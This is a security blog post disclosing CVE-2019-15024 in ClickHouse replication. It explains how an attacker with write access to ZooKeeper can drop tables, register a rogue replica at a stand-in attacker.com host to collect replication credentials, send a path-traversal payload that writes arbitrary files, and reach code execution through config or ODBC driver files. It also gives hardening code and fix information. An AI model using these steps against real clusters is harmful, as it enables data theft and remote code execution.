Why keep your Zoo doors closed

Jul 17, 2020

This is the story of one specific vulnerability in the ClickHouse replication protocol (CVE-2019-15024), but it also illustrates how an enlarged attack surface can be exploited.

ClickHouse is a database for storing large amounts of data, most often using more than one replica. Clustering and replication in ClickHouse are built on top of Apache ZooKeeper (ZK) and require read-write access to it.

A default ZK installation does not require authentication, and thousands of ZK servers managing Kafka, Hadoop, ClickHouse and other configurations are publicly accessible.

To decrease the attack surface, you should always configure authentication and authorization for your ZooKeeper installation.
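As a small illustration of what configuring authorization involves, ZooKeeper's built-in digest scheme identifies a user by the string user:base64(sha1(user:password)). The sketch below only computes that id and prints a zkCli-style setAcl line; the account name, password and the choice of the /clickhouse path are placeholders, not values from any real setup.

```python
import base64
import hashlib


def zk_digest_acl_id(user: str, password: str) -> str:
    """Return 'user:base64(sha1(user:password))', the id used by ZooKeeper's digest scheme."""
    credential = f"{user}:{password}".encode("utf-8")
    digest = base64.b64encode(hashlib.sha1(credential).digest()).decode("ascii")
    return f"{user}:{digest}"


# Hypothetical account and password, for illustration only.
acl_id = zk_digest_acl_id("clickhouse", "change-me")

# 'cdrwa' grants create, delete, read, write and admin to this one identity.
print(f"setAcl /clickhouse digest:{acl_id}:cdrwa")
```

An ACL like this only helps if every client, ClickHouse included, then authenticates with the same credentials, and if the znodes that matter are all covered by it.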

There are some Java deserialization 0-days buried in there as well, but for now simply imagine that an attacker can read and write to the ZooKeeper you use for ClickHouse replication.

When configured in cluster mode, ClickHouse supports distributed DDL requests. Such requests are passed through ZK: a node is created for each of them under /clickhouse/task_queue/ddl.

For example, if you create the node /clickhouse/task_queue/ddl/query-0001 with the content

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

then table xxx will be dropped on hosts host1 and host2 of cluster test. Distributed DDL allows running CREATE/ALTER/DROP queries.

Sounds scary? But where can an attacker get the host addresses?

ClickHouse replication works at the level of an individual table. Thus, when a table is created, a ZK node is specified that will be used to exchange metadata between replicas.
For example, when the following query is executed (ZK must be configured; chXX is the replica name and foobar is the table name)

CREATE TABLE foobar
(
	`action_id` UInt32 DEFAULT toUInt32(0),
	`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

the columns and metadata nodes will be created in ZK, along with per-replica nodes such as

/clickhouse/tables/01-01/foobar/replicas/chXX/host

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
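The node body is plain "key: value" text, so it is easy to read programmatically. The sketch below parses such a body and, as one possible use, flags replicas whose registered host is not on an allowlist. The function names and the allowlist are hypothetical, and fetching the node bodies from ZK is left out.

```python
def parse_host_node(body: str) -> dict:
    """Parse 'key: value' lines such as the replica host node shown above."""
    fields = {}
    for line in body.splitlines():
        if not line.strip():
            continue
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    return fields


def unexpected_replicas(nodes: dict, allowed_hosts: set) -> list:
    """Return names of replicas whose registered host is not in the allowlist."""
    return sorted(
        name
        for name, body in nodes.items()
        if parse_host_node(body).get("host") not in allowed_hosts
    )


example = (
    "host: chXX-address\nport: 9009\ntcp_port: 9000\n"
    "database: default\ntable: foobar\nscheme: http\n"
)
print(parse_host_node(example)["port"])  # 9009
```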

Can data be exfiltrated from this cluster? Yes, if the replication port (TCP/9009) on server chXX-address is not behind a firewall and no authentication is configured for replication. And if authentication is configured, how can it be bypassed?

The attacker can create a new replica node in ZK: just copy all the content from /clickhouse/tables/01-01/foobar/replicas/chXX and change the host value

/clickhouse/tables/01-01/foobar/replicas/attacker/host

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Then the attacker tells the other replicas that a new data block is available and asks them to fetch it from the attacker’s host by creating the ZK node /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX is a monotonically growing counter and has to be greater than that of the last existing log entry)

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

source replica: the name of the attacker’s replica created in the previous step
block_id: the data block identifier
get: the “get block” command (other operations exist as well)
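To make the layout of such an entry concrete, here is a minimal sketch that splits it into header fields, the command and its arguments. It assumes exactly the layout of the entry shown above ("key: value" header lines followed by a command line and its arguments) and makes no attempt to cover other entry types; parse_log_entry is a hypothetical helper name.

```python
def parse_log_entry(body: str) -> dict:
    """Split a replication log entry into header fields, command and arguments."""
    entry = {}
    rest = []
    for line in body.splitlines():
        if not line.strip():
            continue
        key, sep, value = line.partition(": ")
        if sep and not rest:
            # Header lines come first and look like 'key: value'.
            entry[key] = value
        else:
            # The first line without ': ' is the command, the rest are its arguments.
            rest.append(line)
    entry["action"] = rest[0] if rest else None
    entry["args"] = rest[1:]
    return entry


sample = (
    "format version: 4\n"
    "create_time: 2019-07-31 09:37:42\n"
    "source replica: attacker\n"
    "block_id: all_7192349136365807998_13893666115934954449\n"
    "get\n"
    "all_0_0_2\n"
)
entry = parse_log_entry(sample)
print(entry["source replica"], entry["action"], entry["args"])
```

A parser like this could also be used to review which replica names appear as the source in recent log entries.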

After that, each of the replicas will read the new log entry and go to the server under the attacker’s control to retrieve the specified block of data (the replication protocol is binary over HTTP). The attacker.com server will receive requests like

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

where XXX is the replication auth data. In some cases it may belong to an account with access to the DB via the native and HTTP protocols.
As you can see from the above, the attack surface has increased dramatically because the ZooKeeper used for replication was left without authentication.

Let’s take a look at the function that receives a block of data from a replica. It is clearly written with the expectation that all the replicas are controlled and that there is trust between them.

The function reads the number of files, then for each file its name, size and content, and writes it to the filesystem. It is worth describing separately how the data itself is laid out on the filesystem.
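The read loop described above, and the check it would need when the sender is not trusted, can be sketched in Python. This is not ClickHouse's code. The wire layout used here (an 8-byte little-endian file count, a one-byte name length, the name, an 8-byte little-endian size, then the content) is a simplifying assumption, and all function names are hypothetical.

```python
import io
import os
import struct
import tempfile


def read_files(stream):
    """Yield (name, content) pairs from the simplified, assumed layout."""
    (count,) = struct.unpack("<Q", stream.read(8))
    for _ in range(count):
        (name_len,) = struct.unpack("<B", stream.read(1))
        name = stream.read(name_len).decode("utf-8")
        (size,) = struct.unpack("<Q", stream.read(8))
        yield name, stream.read(size)


def safe_target(part_dir: str, name: str) -> str:
    """Resolve name inside part_dir and reject anything that escapes it."""
    root = os.path.realpath(part_dir)
    target = os.path.realpath(os.path.join(root, name))
    if target == root or os.path.commonpath([root, target]) != root:
        raise ValueError(f"refusing to write outside the part directory: {name!r}")
    return target


def store_part(stream, part_dir: str) -> list:
    """Write every received file into part_dir, validating each name first."""
    written = []
    for name, content in read_files(stream):
        target = safe_target(part_dir, name)
        with open(target, "wb") as out:
            out.write(content)
        written.append(target)
    return written


# A well-formed file is stored; a name containing '../' would raise ValueError.
good = struct.pack("<Q", 1) + bytes([9]) + b"count.txt" + struct.pack("<Q", 1) + b"1"
with tempfile.TemporaryDirectory() as part_dir:
    print(store_part(io.BytesIO(good), part_dir))
```

Writing to part_dir + name directly, without the safe_target step, is the trusting behaviour the text describes.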

There are several subdirectories in /var/lib/clickhouse (default, defined by config):

flags — you can put data loss recovery flags in this directory
tmp — for temporary files
user_files — operations with files in queries are limited to this directory (INTO OUTFILE etc.)
metadata — sql files with table descriptions
preprocessed_configs — processed config derivatives from /etc/clickhouse-server
data — the data itself, in this case a separate directory is simply created for each database (/var/lib/clickhouse/data/default).

For each table, a subdirectory with the table name is created in the database directory. Each column has its own file in an engine-dependent format.
For example, for the foobar table above, the following files will be created (named after the columns, plus service files):

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

The replica expects to receive files with the same names for the replicated data block and does not validate them in any way.

The attentive reader has already noticed the unsafe file_name concatenation in the WriteBufferFromFile call: the name received from the remote replica is appended to the part path as is.
Yes, this allows an attacker to write arbitrary content to an arbitrary file on the filesystem with the rights of the clickhouse user.
To achieve this, the replica controlled by the attacker must return the following in its HTTP response (hex notation and line breaks added for clarity):

\x01\x00\x00\x00\x00\x00\x00\x00
\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper

After concatenation with ../../../../../../../../../tmp/pwned the path traverses out of the data directory, and hellofromzookeeper is written to /tmp/pwned.
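The effect of the concatenation is easy to reproduce with plain path normalization. In the sketch below the part directory name is hypothetical, since the exact directory the replica writes to is not given here. The point is only that nine ../ components are more than enough to climb out of it, and that the surplus ones are ignored at the filesystem root.

```python
import posixpath

# Hypothetical directory that a fetched part is written to.
part_dir = "/var/lib/clickhouse/data/default/foobar/tmp_fetch_all_0_0_2/"

# File name supplied by the remote replica.
file_name = "../" * 9 + "tmp/pwned"

# Plain string concatenation, then lexical normalization of the result.
resolved = posixpath.normpath(part_dir + file_name)
print(resolved)  # /tmp/pwned
```

The kernel resolves the path the same way when the file is opened, because .. at the root directory refers to the root itself.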

There are multiple ways to turn an arbitrary filesystem write into RCE.

External dictionaries to RCE

In older versions, the directory with ClickHouse configuration files was owned by the clickhouse user by default. ClickHouse configuration files are XML files; the daemon reads them on start, caches the processed result in /var/lib/clickhouse/preprocessed_configs, and rereads the configs when they change. By controlling /etc/clickhouse-server, an attacker can create their own external dictionary of the executable type and execute arbitrary code.
Current versions of ClickHouse don’t grant these permissions by default, but if a server has been upgraded gradually, such permissions may have remained. If you administer a ClickHouse cluster, check the permissions on the config directory: it must belong to the root user.
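The permission check can be scripted. The sketch below is one possible way to do it: it looks only at the directory itself (not at the files inside it) and reports when the owner is not root or when group or others can write to it. The function name is hypothetical.

```python
import os
import stat


def config_dir_findings(path: str) -> list:
    """Return a list of human-readable permission problems for a directory."""
    findings = []
    info = os.stat(path)
    if info.st_uid != 0:
        findings.append(f"{path} is owned by uid {info.st_uid}, expected root (0)")
    if info.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path} is writable by group or others")
    return findings


# Only meaningful on a host where ClickHouse is installed.
if os.path.isdir("/etc/clickhouse-server"):
    for finding in config_dir_findings("/etc/clickhouse-server"):
        print(finding)
```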

ODBC to RCE

When the server package creates the clickhouse user, the “do not create /nonexistent home directory” option is explicitly set. However, when using external dictionaries or for some other reason, administrators sometimes create the /nonexistent directory and give the clickhouse user write permissions on it.

ClickHouse supports ODBC and is able to connect to other databases. In ODBC you can specify the path to the database driver library (.so). Older versions of ClickHouse allowed doing this directly from the query processor, but strict validation of the connection string was added to odbc-bridge, and it is no longer possible to specify the path to the driver file from a query. But what if an attacker can write to the home directory of the clickhouse user (/nonexistent) using the vulnerability described above?

They can create a .odbc.ini file with the contents

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

then when SELECT * FROM odbc('DSN=lalala', 'test', 'test'); is run, test.so will be loaded and RCE achieved (thanks to @buglloc for the tip).
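From the defender's side, an unexpected .odbc.ini is straightforward to spot. The sketch below parses the file as INI text and flags DSNs whose Driver is an absolute path outside a list of trusted library directories. That list is an assumption to adapt to your distribution, and the function name is hypothetical.

```python
import configparser
import posixpath

# Assumed locations of legitimately installed ODBC drivers; adjust as needed.
TRUSTED_PREFIXES = ("/usr/lib/", "/usr/lib64/", "/usr/local/lib/")


def suspicious_drivers(ini_text: str) -> dict:
    """Map DSN name to driver path for drivers loaded from untrusted locations."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(ini_text)
    flagged = {}
    for section in parser.sections():
        driver = parser.get(section, "Driver", fallback=None)
        if not driver or not driver.startswith("/"):
            continue  # not an absolute path (for example a driver name), out of scope
        # Normalize first so that '/usr/lib/../../tmp/x.so' is not mistaken for trusted.
        if not posixpath.normpath(driver).startswith(TRUSTED_PREFIXES):
            flagged[section] = driver
    return flagged


print(suspicious_drivers("[lalala]\nDriver=/var/lib/clickhouse/user_files/test.so\n"))
```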

This and other vulnerabilities were fixed in ClickHouse version 19.14.3. Keep your ClickHouse and ZooKeepers safe!

Written by kyprizel